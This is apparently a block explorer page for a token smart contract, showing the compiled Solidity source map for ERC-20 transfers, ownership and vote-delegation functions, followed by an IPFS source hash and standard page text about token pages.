;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;28110:18:0;;-1:-1:-1;28139:2:0;28134:7;;28130:21;;28150:1;-1:-1:-1;28143:8:0;;28130:21;28169:12;28162:19;;;28025:164;:::o;16960:122::-;17002:80;16960:122;:::o;29864:332::-;29970:4;29987:47;30008:6;30016:9;30027:6;29987:20;:47::i;:::-;30045:121;30054:6;30062:12;:10;:12::i;:::-;30076:89;30114:6;30076:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;30076:19:0;;;;;;:11;:19;;;;;;30096:12;:10;:12::i;:::-;-1:-1:-1;;;;;30076:33:0;;;;;;;;;;;;-1:-1:-1;30076:33:0;;;:89;:37;:89::i;:::-;30045:8;:121::i;:::-;-1:-1:-1;30184:4:0;29864:332;;;;;:::o;27877:83::-;27943:9;;;;27877:83;:::o;24714:154::-;24825:9;24714:154;:::o;30605:218::-;30693:4;30710:83;30719:12;:10;:12::i;:::-;30733:7;30742:50;30781:10;30742:11;:25;30754:12;:10;:12::i;:::-;-1:-1:-1;;;;;30742:25:0;;;;;;;;;;;;;;;;;-1:-1:-1;30742:25:0;;;:34;;;;;;;;;;;:38;:50::i;23510:315::-;23687:5;;-1:-1:-1;;;;;23687:5:0;23665:10;:28;23657:37;;;;;;23712:9;23707:111;23727:17;;;23707:111;;;23788:6;;23795:1;23788:9;;;;;;;;;;;;;-1:-1:-1;;;;;23788:9:0;-1:-1:-1;;;;;23771:35:0;23780:6;-1:-1:-1;;;;;23771:35:0;;23799:6;23771:35;;;;;;;;;;;;;;;;;;23746:3;;23707:111;;;;23510:315;;;;:::o;17946:149::-;-1:-1:-1;;;;;18066:21:0;;;18034:7;18066:21;;;;;;;;;;;;17946:149;;;;:::o;18239:104::-;18303:32;18313:10;18325:9;18303;:32::i;:::-;18239:104;:::o;16838:49::-;;;;;;;;;;;;;;;:::o;28651:209::-;28754:5;;:21;;;-1:-1:-1;;;28754:21:0;;-1:-1:-1;;;;;28754:21:0;;;;;;;;;28717:7;;;;28754:5;;:12;;:21;;;;;;;;;;;;;;:5;:21;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;28754:21:0;;-1:-1:-1;;;28781:20:0;;28777:39;;;28810:6;-1:-1:-1;28803:13:0;;28777:39;-1:-1:-1;;;;;;;28834:18:0;;;;;:9;:18;;;;;;;28651:209::o;36297:148::-;35877:12;:10;:12::i;:::-;35867:6;;;;;-1:-1:-1;;;;;35867:6:0;;;:22;;;35859:67;;;;;-1:-1:-1;;;35859:67:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;36388:6:::1;::::0;36367:40:::1;::::0;36404:1:::1;::::0;36388:6:::1;::::0;::::1;-1:-1:-1::0;;;;;36388:6:0::1;::::0;36367:40:::1;::::0;36404:1;;36367:40:::1;36418:6;:19:::0;;-1:-1:-1;;;;;;36418:19:0::1;::::0;;36297:148::o;20849:1253::-;20957:7;21004:12;20990:11;:26;20982:78;;;;-1:-1:-1;;;20982:78:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;21095:23:0;;21073:19;21095:23;;;:14;:23;;;;;;;;21133:17;21129:58;;21174:1;21167:8;;;;;21129:58;-1:-1:-1;;;;;21247:20:0;;;;;;:11;:20;;;;;;;;:38;-1:-1:-1;;21268:16:0;;21247:38;;;;;;;;;:48;;:63;-1:-1:-1;21243:147:0;;-1:-1:-1;;;;;21334:20:0;;;;;;:11;:20;;;;;;;;-1:-1:-1;;21355:16:0;;;;21334:38;;;;;;;;21370:1;21334:44;;;-1:-1:-1;21327:51:0;;21243:147;-1:-1:-1;;;;;21451:20:0;;;;;;:11;:20;;;;;;;;:23;;;;;;;;:33;:23;:33;:47;-1:-1:-1;21447:88:0;;;21522:1;21515:8;;;;;21447:88;21547:12;-1:-1:-1;;21589:16:0;;21616:428;21631:5;21623:13;;:5;:13;;;21616:428;;;21695:1;21678:13;;;21677:19;;;21669:27;;21738:20;;:::i;:::-;-1:-1:-1;;;;;;21761:20:0;;;;;;:11;:20;;;;;;;;:28;;;;;;;;;;;;;21738:51;;;;;;;;;;;;;;;;;;;;;;;;;;;;;21808:27;;21804:229;;;21863:8;;;;-1:-1:-1;21856:15:0;;-1:-1:-1;;;;21856:15:0;21804:229;21897:12;;:26;;;-1:-1:-1;21893:140:0;;;21952:6;21944:14;;21893:140;;;22016:1;22007:6;:10;21999:18;;21893:140;21616:428;;;;;-1:-1:-1;;;;;;22061:20:0;;;;;;:11;:20;;;;;;;;:27;;;;;;;;;;:33;;;;-1:-1:-1;;20849:1253:0;;;;:::o;17374:42::-;;;;;;;;;;;;;:::o;35655:79::-;35720:6;;;;;-1:-1:-1;;;;;35720:6:0;;35655:79::o;27152:87::-;27224:7;27217:14;;;;;;;;-1:-1:-1;;27217:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27191:13;;27217:14;;27224:7;;27217:14;;27224:7;27217:14;;;;;;;;;;;;;;;;;;;;;;;;31326:269;31419:4;31436:129;31445:12;:10;:12::i;:::-;31459:7;31468:96;31507:15;31468:96;;;;;;;;;;;;;;;;;:11;:25;31480:12;:10;:12::i;:::-;-1:-1:-1;;;;;31468:25:0;;;;;;;;;;;;;;;;;-1:-1:-1;31468:25:0;;;:34;;;;;;;;;;;:96;:38;:96::i;28402:186::-;28488:4;28505:53;28526:12;:10;:12::i;:::-;28540:9;28551:6;28505:20;:53::i;20163:255::-;-1:-1:-1;;;;;20302:23:0;;20255:7;20302:23;;;:14;:23;;;;;;;;20343:16;:67;;20409:1;20343:67;;;-1:-1:-1;;;;;20362:20:0;;;;;;:11;:20;;;;;;;;:38;-1:-1:-1;;20383:16:0;;20362:38;;;;;;;;20398:1;20362:44;;20343:67;20336:74;20163:255;-1:-1:-1;;;20163:255:0:o;18777:1185::-;19093:20;;;;;;;;;;;;-1:-1:-1;;;19093:20:0;;;;;18970:23;17002:80;19083:31;19133:12;:10;:12::i;:::-;19020:172;;;;;;;;;;;;;;;;;;;;;;;;;19172:4;19020:172;;;;;;;;;;;;;;;;;;;;;;;18996:207;;;;;;17222:71;19261:140;;;;-1:-1:-1;;;;;19261:140:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19237:175;;;;;;-1:-1:-1;;;19466:123:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19442:158;;;;;;;;;-1:-1:-1;19633:26:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18996:207;;-1:-1:-1;19237:175:0;;19442:158;;-1:-1:-1;;19633:26:0;;;;;;;-1:-1:-1;;19633:26:0;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;19633:26:0;;-1:-1:-1;;19633:26:0;;;-1:-1:-1;;;;;;;19678:23:0;;19670:74;;;;-1:-1:-1;;;19670:74:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19772:17:0;;;;;;:6;:17;;;;;:19;;;;;;;;19763:28;;19755:75;;;;-1:-1:-1;;;19755:75:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19856:6;19849:3;:13;;19841:64;;;;-1:-1:-1;;;19841:64:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19923:31;19933:9;19944;19923;:31::i;:::-;19916:38;;;;18777:1185;;;;;;;:::o;28923:151::-;-1:-1:-1;;;;;29039:18:0;;;29012:7;29039:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;28923:151::o;17176:117::-;17222:71;17176:117;:::o;16699:70::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;36600:244::-;35877:12;:10;:12::i;:::-;35867:6;;;;;-1:-1:-1;;;;;35867:6:0;;;:22;;;35859:67;;;;;-1:-1:-1;;;35859:67:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;36689:22:0;::::1;36681:73;;;;-1:-1:-1::0;;;36681:73:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;36791:6;::::0;36770:38:::1;::::0;-1:-1:-1;;;;;36770:38:0;;::::1;::::0;36791:6:::1;::::0;::::1;;::::0;36770:38:::1;::::0;;;::::1;36819:6;:17:::0;;-1:-1:-1;;;;;36819:17:0;;::::1;;;-1:-1:-1::0;;;;;;36819:17:0;;::::1;::::0;;;::::1;::::0;;36600:244::o;661:106::-;749:10;661:106;:::o;33064:408::-;-1:-1:-1;;;;;33166:19:0;;33158:68;;;;-1:-1:-1;;;33158:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;33245:21:0;;33237:68;;;;-1:-1:-1;;;33237:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33320:10;-1:-1:-1;;;;;33320:19:0;;;33316:51;;;33341:5;;:26;;;-1:-1:-1;;;33341:26:0;;:5;:26;;;;;;;;-1:-1:-1;;;;;33341:5:0;;;;:14;;:26;;;;;:5;;:26;;;;;;:5;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33316:51;-1:-1:-1;;;;;33380:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;33432:32;;;;;;;;;;;;;;;;;33064:408;;;:::o;34318:236::-;34429:2;-1:-1:-1;;;;;34414:26:0;34423:4;-1:-1:-1;;;;;34414:26:0;;34433:6;34414:26;;;;;;;;;;;;;;;;;;34462:5;;34474:64;;;-1:-1:-1;;;;;34474:64:0;;;;;;;;;;;;;;;;;;;;34527:10;34474:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;34474:64:0;-1:-1:-1;;;34474:64:0;;;34454:85;;;;34443:6;;34462:5;;;;;34454:85;;;;34474:64;34454:85;;34474:64;34454:85;;;;;;;;;;-1:-1:-1;;34454:85:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34442:97;;;34549:1;34541:10;;;;;;34318:236;;;;:::o;5646:192::-;5732:7;5768:12;5760:6;;;;5752:29;;;;-1:-1:-1;;;5752:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;5804:5:0;;;5646:192::o;4743:181::-;4801:7;4833:5;;;4857:6;;;;4849:46;;;;;-1:-1:-1;;;4849:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;22110:437;-1:-1:-1;;;;;22227:21:0;;;22201:23;22227:21;;;;;;;;;;;;;;;22286:20;22238:9;22286;:20::i;:::-;-1:-1:-1;;;;;22361:21:0;;;:10;:21;;;;;;;;;;;:33;;-1:-1:-1;;;;;;22361:33:0;;;;;;;;;;22412:54;;22259:47;;-1:-1:-1;22361:33:0;22412:54;;;;;;22361:10;22412:54;22479:60;22494:15;22511:9;22522:16;22661:6;-1:-1:-1;;;;;22651:16:0;:6;-1:-1:-1;;;;;22651:16:0;;;:30;;;;;22680:1;22671:6;:10;22651:30;22647:848;;;-1:-1:-1;;;;;22702:20:0;;;22698:385;;-1:-1:-1;;;;;22810:22:0;;22791:16;22810:22;;;:14;:22;;;;;;;;;22871:13;:60;;22930:1;22871:60;;;-1:-1:-1;;;;;22887:19:0;;;;;;:11;:19;;;;;;;;:34;-1:-1:-1;;22907:13:0;;22887:34;;;;;;;;22919:1;22887:40;;22871:60;22851:80;-1:-1:-1;22950:17:0;22970:21;22851:80;22984:6;22970:13;:21::i;:::-;22950:41;;23010:57;23027:6;23035:9;23046;23057;23010:16;:57::i;:::-;22698:385;;;;-1:-1:-1;;;;;23103:20:0;;;23099:385;;-1:-1:-1;;;;;23211:22:0;;23192:16;23211:22;;;:14;:22;;;;;;;;;23272:13;:60;;23331:1;23272:60;;;-1:-1:-1;;;;;23288:19:0;;;;;;:11;:19;;;;;;;;:34;-1:-1:-1;;23308:13:0;;23288:34;;;;;;;;23320:1;23288:40;;23272:60;23252:80;-1:-1:-1;23351:17:0;23371:21;23252:80;23385:6;23371:13;:21::i;:::-;23351:41;;23411:57;23428:6;23436:9;23447;23458;23411:16;:57::i;23099:385::-;22555:947;;;:::o;5207:136::-;5265:7;5292:43;5296:1;5299;5292:43;;;;;;;;;;;;;;;;;:3;:43::i;23833:704::-;24012:18;24033:76;24040:12;24033:76;;;;;;;;;;;;;;;;;:6;:76::i;:::-;24012:97;;24141:1;24126:12;:16;;;:85;;;;-1:-1:-1;;;;;;24146:22:0;;;;;;:11;:22;;;;;;;;:65;-1:-1:-1;;24169:16:0;;24146:40;;;;;;;;;:50;:65;;;:50;;:65;24126:85;24122:339;;;-1:-1:-1;;;;;24228:22:0;;;;;;:11;:22;;;;;;;;:40;-1:-1:-1;;24251:16:0;;24228:40;;;;;;;;24266:1;24228:46;:57;;;24122:339;;;24357:33;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;24318:22:0;;-1:-1:-1;24318:22:0;;;:11;:22;;;;;:36;;;;;;;;;;:72;;;;;;;-1:-1:-1;;24318:72:0;;;;;;;;;;;;;24405:25;;;:14;:25;;;;;;:44;;24433:16;;;24405:44;;;;;;;;;;24122:339;24478:51;;;;;;;;;;;;;;-1:-1:-1;;;;;24478:51:0;;;;;;;;;;;23833:704;;;;;:::o;24545:161::-;24620:6;24658:12;24651:5;24647:9;;24639:32;;;;-1:-1:-1;;;24639:32:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;24696:1:0;;24545:161;-1:-1:-1;;24545:161:0:o;-1:-1:-1:-;;;;;;;;;;;;;;;;;;;:::o
Swarm Source
ipfs://57ca7fede37eac36162972f11ab3e6e1be8c02662fd8d583a0513efc7421f382
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.